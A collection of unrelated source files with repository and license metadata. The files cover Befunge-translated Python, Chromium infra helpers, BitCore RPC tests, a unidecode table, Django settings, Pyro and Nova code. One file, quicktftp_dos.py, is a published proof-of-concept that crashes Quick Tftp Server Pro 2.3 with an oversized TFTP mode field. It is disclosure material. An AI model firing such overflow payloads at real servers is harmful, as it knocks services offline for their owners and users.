g = zlib.decompress(g, 16+zlib.MAX_WBITS)
g=list(map(ord, g))
def gr(x,y):
if(x>=0 and y>=0 and x<80 and y<14):
return g[y*80 + x];
return 0;
def gw(x,y,v):
if(x>=0 and y>=0 and x<80 and y<14):
g[y*80 + x]=v;
def td(a,b):
return ((0)if(b==0)else(a//b))
def tm(a,b):
return ((0)if(b==0)else(a%b))
s=[]
def sp():
global s
if (len(s) == 0):
return 0
return s.pop()
def sa(v):
global s
s.append(v)
def sr():
global s
if (len(s) == 0):
return 0
return s[-1]
def _0():
gw(79,0,48)
gw(79,2,48)
sa(70)
sa(70)
return 1
def _1():
return (24)if(sp()!=0)else(2)
def _2():
gw(79,0,48)
gw(79,2,49)
gw(4,0,0)
sp();
sa(99)
sa(99)
return 3
def _3():
return (4)if(sp()!=0)else(23)
def _4():
sa((sr()-1)%3)
sa(sr());
return (5)if(sp()!=0)else(22)
def _5():
sa(sp()-2)
return (21)if(sp()!=0)else(6)
def _6():
gw(2,0,1)
return 7
def _7():
gw(3,0,79)
sa(79)
sa(gr(79,0)-48)
return 8
def _8():
global t0
global t1
t0=gr(gr(3,0),2)-48
gw(gr(3,0),0,gr(gr(3,0),2))
t0=t0*gr(2,0)
sa(sp()+t0)
t1=sp()
t1=t1+gr(4,0)
gw(gr(3,0),2,(t1%10)+48)
t1=t1/10
gw(4,0,t1)
return (20)if(sr()!=9)else(9)
def _9():
sp();
sa(sp()-1)
return (19)if(sr()!=-1)else(10)
def _10():
sp();
sa(0)
sa(70)
sa(gr(79,2)-48)
sa(gr(79,2)-48)
return 11
def _11():
return (12)if(sp()!=0)else(18)
def _12():
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return 13
def _13():
sa(sr());
return (17)if(sp()!=0)else(14)
def _14():
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sr());
return (15)if(sp()!=0)else(16)
def _15():
sa(sp()+sp());
return 14
def _16():
global t0
sa(sp()+sp());
t0=sp()
sys.stdout.write(str(t0)+" ")
sys.stdout.flush()
return 25
def _17():
sa(sp()-1)
sa(gr(sr()+9,2)-48)
sa(sr());
return 11
def _18():
return (17)if(sp()!=0)else(13)
def _19():
sa(sr());
return 3
def _20():
sa(sp()-1)
sa(sr());
gw(3,0,sp())
sa(sr());
sa(0)
v0=sp()
sa(gr(sp(),v0))
sa(sp()-48)
return 8
def _21():
gw(2,0,((sr()+1)/3)*2)
return 7
def _22():
gw(2,0,1)
sp();
return 7
def _23():
gw(2,0,2)
return 7
def _24():
sa(sp()-1)
sa(sr()+9)
sa(48)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(0)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()+9)
sa(48)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(2)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr());
return 1
m=[_0,_1,_2,_3,_4,_5,_6,_7,_8,_9,_10,_11,_12,_13,_14,_15,_16,_17,_18,_19,_20,_21,_22,_23,_24]
c=0
while c<25:
c=m[c]()
| mit |
nicko96/Chrome-Infra | infra_libs/infra_types/infra_types.py | 8 | 2255 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import operator
def freeze(obj):
"""Takes a generic object ``obj``, and returns an immutable version of it.
Supported types:
* dict / OrderedDict -> FrozenDict
* list -> tuple
* set -> frozenset
* any object with a working __hash__ implementation (assumes that hashable
means immutable)
Will raise TypeError if you pass an object which is not hashable.
"""
if isinstance(obj, dict):
return FrozenDict((freeze(k), freeze(v)) for k, v in obj.iteritems())
elif isinstance(obj, (list, tuple)):
return tuple(freeze(i) for i in obj)
elif isinstance(obj, set):
return frozenset(freeze(i) for i in obj)
else:
hash(obj)
return obj
def thaw(obj):
"""Takes an object from freeze() and returns a mutable copy of it."""
if isinstance(obj, FrozenDict):
return collections.OrderedDict(
(thaw(k), thaw(v)) for k, v in obj.iteritems())
elif isinstance(obj, tuple):
return list(thaw(i) for i in obj)
elif isinstance(obj, frozenset):
return set(thaw(i) for i in obj)
else:
return obj
class FrozenDict(collections.Mapping):
"""An immutable OrderedDict.
Modified From: http://stackoverflow.com/a/2704866
"""
def __init__(self, *args, **kwargs):
self._d = collections.OrderedDict(*args, **kwargs)
# Calculate the hash immediately so that we know all the items are
# hashable too.
self._hash = reduce(operator.xor,
(hash(i) for i in enumerate(self._d.iteritems())), 0)
def __eq__(self, other):
if not isinstance(other, collections.Mapping):
return NotImplemented
if self is other:
return True
if len(self) != len(other):
return False
for k, v in self.iteritems():
if k not in other or other[k] != v:
return False
return True
def __iter__(self):
return iter(self._d)
def __len__(self):
return len(self._d)
def __getitem__(self, key):
return self._d[key]
def __hash__(self):
return self._hash
def __repr__(self):
return 'FrozenDict(%r)' % (self._d.items(),)
| bsd-3-clause |
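freeze() above converts containers into hashable counterparts and thaw() reverses it; FrozenDict is the immutable mapping that makes frozen dicts usable as cache keys. A round-trip sketch (the module is Python 2 as written; the config keys and values here are invented):
# --- illustrative sketch, not part of the dataset row above ---
from infra_types import freeze, thaw   # assumed import name

config = {'name': 'build-01', 'tags': ['linux', 'x64'], 'opts': {'retries': 3}}
frozen = freeze(config)            # dict -> FrozenDict, list -> tuple, set -> frozenset
cache = {frozen: 'cached-result'}  # hashable, so it can key a dict
assert frozen['tags'] == ('linux', 'x64')
assert thaw(frozen) == config      # thaw() restores mutable copies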
gkweb76/exploits | quicktftp_dos.py | 1 | 1472 | # Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow (DoS)
# Date: 21/01/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
# Software Link: http://www.tallsoft.com/tftpserver_setup.exe
# Version: 2.3
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-01-21: Vulnerability discovered
2016-01-24: Vendor contacted
2016-01-29: Vendor contacted again (no answer)
2016-03-01: Vulnerability published
Description :
-------------
A remote overflow exists in Quick Tftp Server Pro 2.3 in the TFTP mode when sending a TFTP Read Request. This allows to remotely crash
the application, thus causing a Denial of Service.
Instructions:
-------------
- Start Quick Tftp Server Pro 2.3
- Run this exploit locally or from your remote attacking machine
"""
import socket
host = "192.168.135.132"
port = 69
request = "\x00\x01" # TFTP Read Request (RRQ)
file = "file.txt"
mode = '\x41' * 1024 # Overflow
buffer = request + file + "\x00" + mode + "\x00"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print "[*] Sending buffer to %s (%d bytes)..." % (host, len(buffer))
s.sendto(buffer, (host, port))
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
| mit |
LIMXTEC/BitCore | test/functional/blockchain.py | 1 | 5890 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPCs related to blockchainstate.
Test the following RPCs:
- gettxoutsetinfo
- getdifficulty
- getbestblockhash
- getblockhash
- getblockheader
- getchaintxstats
- getnetworkhashps
- verifychain
Tests correspond to code in rpc/blockchain.cpp.
"""
from decimal import Decimal
import http.client
import subprocess
from test_framework.test_framework import (BitcoinTestFramework, BITCORED_PROC_WAIT_TIMEOUT)
from test_framework.util import (
assert_equal,
assert_raises,
assert_raises_jsonrpc,
assert_is_hex_string,
assert_is_hash_string,
)
class BlockchainTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = False
self.num_nodes = 1
self.extra_args = [['-stopatheight=207']]
def run_test(self):
self._test_getchaintxstats()
self._test_gettxoutsetinfo()
self._test_getblockheader()
self._test_getdifficulty()
self._test_getnetworkhashps()
self._test_stopatheight()
assert self.nodes[0].verifychain(4, 0)
def _test_getchaintxstats(self):
chaintxstats = self.nodes[0].getchaintxstats(1)
# 200 txs plus genesis tx
assert_equal(chaintxstats['txcount'], 201)
# tx rate should be 1 per 10 minutes, or 1/600
# we have to round because of binary math
assert_equal(round(chaintxstats['txrate'] * 600, 10), Decimal(1))
def _test_gettxoutsetinfo(self):
node = self.nodes[0]
res = node.gettxoutsetinfo()
assert_equal(res['total_amount'], Decimal('8725.00000000'))
assert_equal(res['transactions'], 200)
assert_equal(res['height'], 200)
assert_equal(res['txouts'], 200)
assert_equal(res['bogosize'], 17000),
assert_equal(res['bestblock'], node.getblockhash(200))
size = res['disk_size']
assert size > 6400
assert size < 64000
assert_equal(len(res['bestblock']), 64)
assert_equal(len(res['hash_serialized_2']), 64)
self.log.info("Test that gettxoutsetinfo() works for blockchain with just the genesis block")
b1hash = node.getblockhash(1)
node.invalidateblock(b1hash)
res2 = node.gettxoutsetinfo()
assert_equal(res2['transactions'], 0)
assert_equal(res2['total_amount'], Decimal('0'))
assert_equal(res2['height'], 0)
assert_equal(res2['txouts'], 0)
assert_equal(res2['bogosize'], 0),
assert_equal(res2['bestblock'], node.getblockhash(0))
assert_equal(len(res2['hash_serialized_2']), 64)
self.log.info("Test that gettxoutsetinfo() returns the same result after invalidate/reconsider block")
node.reconsiderblock(b1hash)
res3 = node.gettxoutsetinfo()
assert_equal(res['total_amount'], res3['total_amount'])
assert_equal(res['transactions'], res3['transactions'])
assert_equal(res['height'], res3['height'])
assert_equal(res['txouts'], res3['txouts'])
assert_equal(res['bogosize'], res3['bogosize'])
assert_equal(res['bestblock'], res3['bestblock'])
assert_equal(res['hash_serialized_2'], res3['hash_serialized_2'])
def _test_getblockheader(self):
node = self.nodes[0]
assert_raises_jsonrpc(-5, "Block not found",
node.getblockheader, "nonsense")
besthash = node.getbestblockhash()
secondbesthash = node.getblockhash(199)
header = node.getblockheader(besthash)
assert_equal(header['hash'], besthash)
assert_equal(header['height'], 200)
assert_equal(header['confirmations'], 1)
assert_equal(header['previousblockhash'], secondbesthash)
assert_is_hex_string(header['chainwork'])
assert_is_hash_string(header['hash'])
assert_is_hash_string(header['previousblockhash'])
assert_is_hash_string(header['merkleroot'])
assert_is_hash_string(header['bits'], length=None)
assert isinstance(header['time'], int)
assert isinstance(header['mediantime'], int)
assert isinstance(header['nonce'], int)
assert isinstance(header['version'], int)
assert isinstance(int(header['versionHex'], 16), int)
assert isinstance(header['difficulty'], Decimal)
def _test_getdifficulty(self):
difficulty = self.nodes[0].getdifficulty()
# 1 hash in 2 should be valid, so difficulty should be 1/2**31
# binary => decimal => binary math is why we do this check
assert abs(difficulty * 2**31 - 1) < 0.0001
def _test_getnetworkhashps(self):
hashes_per_second = self.nodes[0].getnetworkhashps()
# This should be 2 hashes every 10 minutes or 1/300
assert abs(hashes_per_second * 300 - 1) < 0.0001
def _test_stopatheight(self):
assert_equal(self.nodes[0].getblockcount(), 200)
self.nodes[0].generate(6)
assert_equal(self.nodes[0].getblockcount(), 206)
self.log.debug('Node should not stop at this height')
assert_raises(subprocess.TimeoutExpired, lambda: self.bitcored_processes[0].wait(timeout=3))
try:
self.nodes[0].generate(1)
except (ConnectionError, http.client.BadStatusLine):
pass # The node already shut down before response
self.log.debug('Node should stop at this height...')
self.bitcored_processes[0].wait(timeout=BITCORED_PROC_WAIT_TIMEOUT)
self.nodes[0] = self.start_node(0, self.options.tmpdir)
assert_equal(self.nodes[0].getblockcount(), 207)
if __name__ == '__main__':
BlockchainTest().main()
| mit |
dgarciam/Sick-Beard | lib/unidecode/x090.py | 251 | 4631 | data = (
'Tui ', # 0x00
'Song ', # 0x01
'Gua ', # 0x02
'Tao ', # 0x03
'Pang ', # 0x04
'Hou ', # 0x05
'Ni ', # 0x06
'Dun ', # 0x07
'Jiong ', # 0x08
'Xuan ', # 0x09
'Xun ', # 0x0a
'Bu ', # 0x0b
'You ', # 0x0c
'Xiao ', # 0x0d
'Qiu ', # 0x0e
'Tou ', # 0x0f
'Zhu ', # 0x10
'Qiu ', # 0x11
'Di ', # 0x12
'Di ', # 0x13
'Tu ', # 0x14
'Jing ', # 0x15
'Ti ', # 0x16
'Dou ', # 0x17
'Yi ', # 0x18
'Zhe ', # 0x19
'Tong ', # 0x1a
'Guang ', # 0x1b
'Wu ', # 0x1c
'Shi ', # 0x1d
'Cheng ', # 0x1e
'Su ', # 0x1f
'Zao ', # 0x20
'Qun ', # 0x21
'Feng ', # 0x22
'Lian ', # 0x23
'Suo ', # 0x24
'Hui ', # 0x25
'Li ', # 0x26
'Sako ', # 0x27
'Lai ', # 0x28
'Ben ', # 0x29
'Cuo ', # 0x2a
'Jue ', # 0x2b
'Beng ', # 0x2c
'Huan ', # 0x2d
'Dai ', # 0x2e
'Lu ', # 0x2f
'You ', # 0x30
'Zhou ', # 0x31
'Jin ', # 0x32
'Yu ', # 0x33
'Chuo ', # 0x34
'Kui ', # 0x35
'Wei ', # 0x36
'Ti ', # 0x37
'Yi ', # 0x38
'Da ', # 0x39
'Yuan ', # 0x3a
'Luo ', # 0x3b
'Bi ', # 0x3c
'Nuo ', # 0x3d
'Yu ', # 0x3e
'Dang ', # 0x3f
'Sui ', # 0x40
'Dun ', # 0x41
'Sui ', # 0x42
'Yan ', # 0x43
'Chuan ', # 0x44
'Chi ', # 0x45
'Ti ', # 0x46
'Yu ', # 0x47
'Shi ', # 0x48
'Zhen ', # 0x49
'You ', # 0x4a
'Yun ', # 0x4b
'E ', # 0x4c
'Bian ', # 0x4d
'Guo ', # 0x4e
'E ', # 0x4f
'Xia ', # 0x50
'Huang ', # 0x51
'Qiu ', # 0x52
'Dao ', # 0x53
'Da ', # 0x54
'Wei ', # 0x55
'Appare ', # 0x56
'Yi ', # 0x57
'Gou ', # 0x58
'Yao ', # 0x59
'Chu ', # 0x5a
'Liu ', # 0x5b
'Xun ', # 0x5c
'Ta ', # 0x5d
'Di ', # 0x5e
'Chi ', # 0x5f
'Yuan ', # 0x60
'Su ', # 0x61
'Ta ', # 0x62
'Qian ', # 0x63
'[?] ', # 0x64
'Yao ', # 0x65
'Guan ', # 0x66
'Zhang ', # 0x67
'Ao ', # 0x68
'Shi ', # 0x69
'Ce ', # 0x6a
'Chi ', # 0x6b
'Su ', # 0x6c
'Zao ', # 0x6d
'Zhe ', # 0x6e
'Dun ', # 0x6f
'Di ', # 0x70
'Lou ', # 0x71
'Chi ', # 0x72
'Cuo ', # 0x73
'Lin ', # 0x74
'Zun ', # 0x75
'Rao ', # 0x76
'Qian ', # 0x77
'Xuan ', # 0x78
'Yu ', # 0x79
'Yi ', # 0x7a
'Wu ', # 0x7b
'Liao ', # 0x7c
'Ju ', # 0x7d
'Shi ', # 0x7e
'Bi ', # 0x7f
'Yao ', # 0x80
'Mai ', # 0x81
'Xie ', # 0x82
'Sui ', # 0x83
'Huan ', # 0x84
'Zhan ', # 0x85
'Teng ', # 0x86
'Er ', # 0x87
'Miao ', # 0x88
'Bian ', # 0x89
'Bian ', # 0x8a
'La ', # 0x8b
'Li ', # 0x8c
'Yuan ', # 0x8d
'Yao ', # 0x8e
'Luo ', # 0x8f
'Li ', # 0x90
'Yi ', # 0x91
'Ting ', # 0x92
'Deng ', # 0x93
'Qi ', # 0x94
'Yong ', # 0x95
'Shan ', # 0x96
'Han ', # 0x97
'Yu ', # 0x98
'Mang ', # 0x99
'Ru ', # 0x9a
'Qiong ', # 0x9b
'[?] ', # 0x9c
'Kuang ', # 0x9d
'Fu ', # 0x9e
'Kang ', # 0x9f
'Bin ', # 0xa0
'Fang ', # 0xa1
'Xing ', # 0xa2
'Na ', # 0xa3
'Xin ', # 0xa4
'Shen ', # 0xa5
'Bang ', # 0xa6
'Yuan ', # 0xa7
'Cun ', # 0xa8
'Huo ', # 0xa9
'Xie ', # 0xaa
'Bang ', # 0xab
'Wu ', # 0xac
'Ju ', # 0xad
'You ', # 0xae
'Han ', # 0xaf
'Tai ', # 0xb0
'Qiu ', # 0xb1
'Bi ', # 0xb2
'Pei ', # 0xb3
'Bing ', # 0xb4
'Shao ', # 0xb5
'Bei ', # 0xb6
'Wa ', # 0xb7
'Di ', # 0xb8
'Zou ', # 0xb9
'Ye ', # 0xba
'Lin ', # 0xbb
'Kuang ', # 0xbc
'Gui ', # 0xbd
'Zhu ', # 0xbe
'Shi ', # 0xbf
'Ku ', # 0xc0
'Yu ', # 0xc1
'Gai ', # 0xc2
'Ge ', # 0xc3
'Xi ', # 0xc4
'Zhi ', # 0xc5
'Ji ', # 0xc6
'Xun ', # 0xc7
'Hou ', # 0xc8
'Xing ', # 0xc9
'Jiao ', # 0xca
'Xi ', # 0xcb
'Gui ', # 0xcc
'Nuo ', # 0xcd
'Lang ', # 0xce
'Jia ', # 0xcf
'Kuai ', # 0xd0
'Zheng ', # 0xd1
'Otoko ', # 0xd2
'Yun ', # 0xd3
'Yan ', # 0xd4
'Cheng ', # 0xd5
'Dou ', # 0xd6
'Chi ', # 0xd7
'Lu ', # 0xd8
'Fu ', # 0xd9
'Wu ', # 0xda
'Fu ', # 0xdb
'Gao ', # 0xdc
'Hao ', # 0xdd
'Lang ', # 0xde
'Jia ', # 0xdf
'Geng ', # 0xe0
'Jun ', # 0xe1
'Ying ', # 0xe2
'Bo ', # 0xe3
'Xi ', # 0xe4
'Bei ', # 0xe5
'Li ', # 0xe6
'Yun ', # 0xe7
'Bu ', # 0xe8
'Xiao ', # 0xe9
'Qi ', # 0xea
'Pi ', # 0xeb
'Qing ', # 0xec
'Guo ', # 0xed
'Zhou ', # 0xee
'Tan ', # 0xef
'Zou ', # 0xf0
'Ping ', # 0xf1
'Lai ', # 0xf2
'Ni ', # 0xf3
'Chen ', # 0xf4
'You ', # 0xf5
'Bu ', # 0xf6
'Xiang ', # 0xf7
'Dan ', # 0xf8
'Ju ', # 0xf9
'Yong ', # 0xfa
'Qiao ', # 0xfb
'Yi ', # 0xfc
'Du ', # 0xfd
'Yan ', # 0xfe
'Mei ', # 0xff
)
| gpl-3.0 |
Puyb/inscriptions_roller | inscriptions/settings/docker.py | 1 | 1360 | from .default import *
import os
ALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS').split(',')
ADMINS = (
(environ.get('EMAIL_ADMIN', ''), environ.get('EMAIL_ADMIN', '')),
)
DEBUG = environ.get('DEBUG', '') == 'True'
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
if DEBUG:
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
EMAIL_HOST = environ.get('EMAIL_HOST', '')
EMAIL_PORT = environ.get('EMAIL_PORT', '')
EMAIL_HOST_USER = environ.get('EMAIL_HOST_USER', '')
EMAIL_HOST_PASSWORD = environ.get('EMAIL_HOST_PASSWORD', '')
DEFAULT_FROM_MAIL = environ.get('DEFAULT_FROM_MAIL', '')
IMAP_HOST = environ.get('IMAP_HOST', '')
IMAP_PORT = environ.get('IMAP_PORT', '')
IMAP_USER = environ.get('IMAP_USER', '')
IMAP_PASSWORD = environ.get('IMAP_PASSWORD', '')
MAPQUEST_API_KEY = environ.get('MAPQUEST_API_KEY', '')
CONTACT_MAIL = environ.get('CONTACT_MAIL', '')
if DEBUG:
INSTALLED_APPS.append('debug_toolbar')
INSTALLED_APPS.append('django_extensions')
MIDDLEWARE.insert(0, 'debug_toolbar.middleware.DebugToolbarMiddleware')
INTERNAL_IPS = ('127.0.0.1', )
DATABASES = {
"default": {
"ENGINE": "django.db.backends.postgresql_psycopg2",
"NAME": environ.get('DB_NAME', ''),
"USER": environ.get('DB_USER', ''),
"PASSWORD": environ.get('DB_PASSWORD', ''),
"HOST": environ.get('DB_HOST', ''),
}
}
| gpl-3.0 |
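The settings module above is configured entirely through environment variables, typically injected by the container runtime. As a quick reference, a sketch of the variables it reads, with placeholder values only:
# --- illustrative sketch, not part of the dataset row above (all values are placeholders) ---
EXAMPLE_ENV = {
    'ALLOWED_HOSTS': 'example.org,www.example.org',
    'DEBUG': 'False',
    'EMAIL_ADMIN': 'admin@example.org',
    'EMAIL_HOST': 'smtp.example.org', 'EMAIL_PORT': '587',
    'EMAIL_HOST_USER': 'mailer', 'EMAIL_HOST_PASSWORD': 'secret',
    'DEFAULT_FROM_MAIL': 'noreply@example.org',
    'IMAP_HOST': 'imap.example.org', 'IMAP_PORT': '993',
    'IMAP_USER': 'mailer', 'IMAP_PASSWORD': 'secret',
    'MAPQUEST_API_KEY': 'placeholder-key',
    'CONTACT_MAIL': 'contact@example.org',
    'DB_NAME': 'inscriptions', 'DB_USER': 'inscriptions',
    'DB_PASSWORD': 'secret', 'DB_HOST': 'db',
}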
uber/pyro | pyro/infer/reparam/studentt.py | 1 | 1327 | # Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
import pyro
import pyro.distributions as dist
from .reparam import Reparam
class StudentTReparam(Reparam):
"""
Auxiliary variable reparameterizer for
:class:`~pyro.distributions.StudentT` random variables.
This is useful in combination with
:class:`~pyro.infer.reparam.hmm.LinearHMMReparam` because it allows
StudentT processes to be treated as conditionally Gaussian processes,
permitting cheap inference via :class:`~pyro.distributions.GaussianHMM` .
This reparameterizes a :class:`~pyro.distributions.StudentT` by introducing
an auxiliary :class:`~pyro.distributions.Gamma` variable conditioned on
which the result is :class:`~pyro.distributions.Normal` .
"""
def __call__(self, name, fn, obs):
fn, event_dim = self._unwrap(fn)
assert isinstance(fn, dist.StudentT)
# Draw a sample that depends only on df.
half_df = fn.df * 0.5
gamma = pyro.sample("{}_gamma".format(name),
self._wrap(dist.Gamma(half_df, half_df), event_dim))
# Construct a scaled Normal.
loc = fn.loc
scale = fn.scale * gamma.rsqrt()
new_fn = self._wrap(dist.Normal(loc, scale), event_dim)
return new_fn, obs
| apache-2.0 |
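To see the reparameterizer above in action, it would typically be attached to a sample site with Pyro's poutine.reparam handler; the handler name and trace API here are assumed from Pyro's public interface rather than stated in the row above.
# --- illustrative sketch, not part of the dataset row above ---
import pyro
import pyro.distributions as dist
from pyro import poutine
from pyro.infer.reparam.studentt import StudentTReparam

def model():
    # heavy-tailed latent; under the reparam it becomes a Gamma auxiliary plus a Normal
    return pyro.sample("x", dist.StudentT(3.0, 0.0, 1.0))

reparam_model = poutine.reparam(model, config={"x": StudentTReparam()})
trace = poutine.trace(reparam_model).get_trace()
print(sorted(trace.nodes.keys()))   # expect an 'x_gamma' auxiliary site alongside 'x'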
klmitch/nova | nova/tests/functional/db/test_host_mapping.py | 6 | 8764 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import uuidutils
from nova import context
from nova import exception
from nova import objects
from nova.objects import cell_mapping
from nova.objects import host_mapping
from nova import test
from nova.tests import fixtures
sample_mapping = {'host': 'fake-host',
'cell_mapping': None}
sample_cell_mapping = {'id': 1,
'uuid': '',
'name': 'fake-cell',
'transport_url': 'rabbit:///',
'database_connection': 'mysql:///'}
def create_cell_mapping(**kwargs):
args = sample_cell_mapping.copy()
if 'uuid' not in kwargs:
args['uuid'] = uuidutils.generate_uuid()
args.update(kwargs)
ctxt = context.RequestContext('fake-user', 'fake-project')
return cell_mapping.CellMapping._create_in_db(ctxt, args)
def create_mapping(**kwargs):
args = sample_mapping.copy()
args.update(kwargs)
if args["cell_mapping"] is None:
args["cell_mapping"] = create_cell_mapping()
args["cell_id"] = args.pop("cell_mapping", {}).get("id")
ctxt = context.RequestContext('fake-user', 'fake-project')
return host_mapping.HostMapping._create_in_db(ctxt, args)
def create_mapping_obj(context, **kwargs):
mapping = create_mapping(**kwargs)
return host_mapping.HostMapping._from_db_object(
context, host_mapping.HostMapping(), mapping)
class HostMappingTestCase(test.NoDBTestCase):
USES_DB_SELF = True
def setUp(self):
super(HostMappingTestCase, self).setUp()
self.useFixture(fixtures.Database(database='api'))
self.context = context.RequestContext('fake-user', 'fake-project')
self.mapping_obj = host_mapping.HostMapping()
self.cell_mapping_obj = cell_mapping.CellMapping()
def _compare_cell_obj_to_mapping(self, obj, mapping):
for key in [key for key in self.cell_mapping_obj.fields.keys()
if key not in ("created_at", "updated_at")]:
self.assertEqual(getattr(obj, key), mapping[key])
def test_get_by_host(self):
mapping = create_mapping()
db_mapping = self.mapping_obj._get_by_host_from_db(
self.context, mapping['host'])
for key in self.mapping_obj.fields.keys():
if key == "cell_mapping":
key = "cell_id"
self.assertEqual(db_mapping[key], mapping[key])
def test_get_by_host_not_found(self):
self.assertRaises(exception.HostMappingNotFound,
self.mapping_obj._get_by_host_from_db, self.context,
'fake-host2')
def test_update_cell_mapping(self):
db_hm = create_mapping()
db_cell = create_cell_mapping(id=42)
cell = cell_mapping.CellMapping.get_by_uuid(
self.context, db_cell['uuid'])
hm = host_mapping.HostMapping(self.context)
hm.id = db_hm['id']
hm.cell_mapping = cell
hm.save()
self.assertNotEqual(db_hm['cell_id'], hm.cell_mapping.id)
for key in hm.fields.keys():
if key in ('updated_at', 'cell_mapping'):
continue
model_field = getattr(hm, key)
if key == 'created_at':
model_field = model_field.replace(tzinfo=None)
self.assertEqual(db_hm[key], model_field, 'field %s' % key)
db_hm_new = host_mapping.HostMapping._get_by_host_from_db(
self.context, db_hm['host'])
self.assertNotEqual(db_hm['cell_id'], db_hm_new['cell_id'])
def test_destroy_in_db(self):
mapping = create_mapping()
self.mapping_obj._get_by_host_from_db(self.context,
mapping['host'])
self.mapping_obj._destroy_in_db(self.context, mapping['host'])
self.assertRaises(exception.HostMappingNotFound,
self.mapping_obj._get_by_host_from_db, self.context,
mapping['host'])
def test_load_cell_mapping(self):
cell = create_cell_mapping(id=42)
mapping_obj = create_mapping_obj(self.context, cell_mapping=cell)
cell_map_obj = mapping_obj.cell_mapping
self._compare_cell_obj_to_mapping(cell_map_obj, cell)
def test_host_mapping_list_get_by_cell_id(self):
"""Tests getting all of the HostMappings for a given CellMapping id.
"""
# we shouldn't have any host mappings yet
self.assertEqual(0, len(host_mapping.HostMappingList.get_by_cell_id(
self.context, sample_cell_mapping['id'])))
# now create a host mapping
db_host_mapping = create_mapping()
# now we should list out one host mapping for the cell
host_mapping_list = host_mapping.HostMappingList.get_by_cell_id(
self.context, db_host_mapping['cell_id'])
self.assertEqual(1, len(host_mapping_list))
self.assertEqual(db_host_mapping['id'], host_mapping_list[0].id)
class HostMappingDiscoveryTest(test.TestCase):
def _setup_cells(self):
ctxt = context.get_admin_context()
self.celldbs = fixtures.CellDatabases()
cells = []
for uuid in (uuids.cell1, uuids.cell2, uuids.cell3):
cm = objects.CellMapping(context=ctxt,
uuid=uuid,
database_connection=uuid,
transport_url='fake://')
cm.create()
cells.append(cm)
self.celldbs.add_cell_database(uuid)
self.useFixture(self.celldbs)
for cell in cells:
for i in (1, 2, 3):
# Make one host in each cell unmapped
mapped = 0 if i == 2 else 1
host = 'host-%s-%i' % (cell.uuid, i)
if mapped:
hm = objects.HostMapping(context=ctxt,
cell_mapping=cell,
host=host)
hm.create()
with context.target_cell(ctxt, cell):
cn = objects.ComputeNode(
context=ctxt, vcpus=1, memory_mb=1, local_gb=1,
vcpus_used=0, memory_mb_used=0, local_gb_used=0,
hypervisor_type='danvm', hypervisor_version='1',
cpu_info='foo',
cpu_allocation_ratio=1.0,
ram_allocation_ratio=1.0,
disk_allocation_ratio=1.0,
mapped=mapped, host=host)
cn.create()
def test_discover_hosts(self):
status = lambda m: None
ctxt = context.get_admin_context()
# NOTE(danms): Three cells, one unmapped host per cell
mappings = host_mapping.discover_hosts(ctxt, status_fn=status)
self.assertEqual(3, len(mappings))
# NOTE(danms): All hosts should be mapped now, so we should do
# no lookups for them
with mock.patch('nova.objects.HostMapping.get_by_host') as mock_gbh:
mappings = host_mapping.discover_hosts(ctxt, status_fn=status)
self.assertFalse(mock_gbh.called)
self.assertEqual(0, len(mappings))
def test_discover_hosts_one_cell(self):
status = lambda m: None
ctxt = context.get_admin_context()
cells = objects.CellMappingList.get_all(ctxt)
# NOTE(danms): One cell, one unmapped host per cell
mappings = host_mapping.discover_hosts(ctxt, cells[1].uuid,
status_fn=status)
self.assertEqual(1, len(mappings))
# NOTE(danms): Three cells, two with one more unmapped host
mappings = host_mapping.discover_hosts(ctxt, status_fn=status)
self.assertEqual(2, len(mappings))
# NOTE(danms): All hosts should be mapped now, so we should do
# no lookups for them
with mock.patch('nova.objects.HostMapping.get_by_host') as mock_gbh:
mappings = host_mapping.discover_hosts(ctxt, status_fn=status)
self.assertFalse(mock_gbh.called)
self.assertEqual(0, len(mappings))
| apache-2.0 |
ar4s/django | django/contrib/gis/gdal/tests/test_driver.py | 6 | 1147 | import unittest
from unittest import skipUnless
from django.contrib.gis.gdal import HAS_GDAL
if HAS_GDAL:
from django.contrib.gis.gdal import Driver, OGRException
valid_drivers = ('ESRI Shapefile', 'MapInfo File', 'TIGER', 'S57', 'DGN',
'Memory', 'CSV', 'GML', 'KML')
invalid_drivers = ('Foo baz', 'clucka', 'ESRI Shp')
aliases = {'eSrI' : 'ESRI Shapefile',
'TigER/linE' : 'TIGER',
'SHAPE' : 'ESRI Shapefile',
'sHp' : 'ESRI Shapefile',
}
@skipUnless(HAS_GDAL, "GDAL is required")
class DriverTest(unittest.TestCase):
def test01_valid_driver(self):
"Testing valid OGR Data Source Drivers."
for d in valid_drivers:
dr = Driver(d)
self.assertEqual(d, str(dr))
def test02_invalid_driver(self):
"Testing invalid OGR Data Source Drivers."
for i in invalid_drivers:
self.assertRaises(OGRException, Driver, i)
def test03_aliases(self):
"Testing driver aliases."
